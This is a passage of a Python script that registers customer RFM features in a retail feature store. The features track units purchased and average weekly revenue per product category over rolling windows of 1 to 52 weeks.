fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_32W', desc='Last 32 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_SCHOOL_SUPPLIES_RATE_52W', desc='Last 52 weeks units purchased count in the School Supplies category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","School Supplies","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_1W', desc='Last weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_2W', desc='Last 2 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_4W', desc='Last 4 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_8W', desc='Last 8 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_16W', desc='Last 16 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_32W', desc='Last 32 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOYS_RATE_52W', desc='Last 52 weeks units purchased count in the Toys category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Toys","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_1W', desc='Last weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_2W', desc='Last 2 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_4W', desc='Last 4 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_8W', desc='Last 8 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_16W', desc='Last 16 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_32W', desc='Last 32 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TRAVEL_RATE_52W', desc='Last 52 weeks units purchased count in the Travel category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Travel","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_1W', desc='Last weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_2W', desc='Last 2 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_4W', desc='Last 4 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_8W', desc='Last 8 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_16W', desc='Last 16 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_32W', desc='Last 32 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_TOTAL_RATE_52W', desc='Last 52 weeks units purchased count in the Total category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Items","ProductCategory","Total","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Clothing","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Deli","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Garden","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_1W', desc='Last weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Home category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_HOME_DECOR_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Home Decor category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Home Decor","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_JEWELRY_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Jewelry category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Jewelry","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","8"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_16W', desc='Last 16 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","16"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_32W', desc='Last 32 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","32"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_KITCHEN_REVN_RATE_52W', desc='Last 52 weeks avg revenue per week in the Kitchen category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Kitchen","TimeGranularity","Week","WindowLength","52"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_1W', desc='Last 1 week avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","1"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_2W', desc='Last 2 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","2"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_4W', desc='Last 4 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","4"])
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_NOVELTY_REVN_RATE_8W', desc='Last 8 weeks avg revenue per week in the Novelty category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=["Entity","Customer","Calculation","RFM","MetricType","Rate","UnitOfMeasure","Dollars","ProductCategory","Novelty","TimeGranularity","Week","WindowLength","8"])
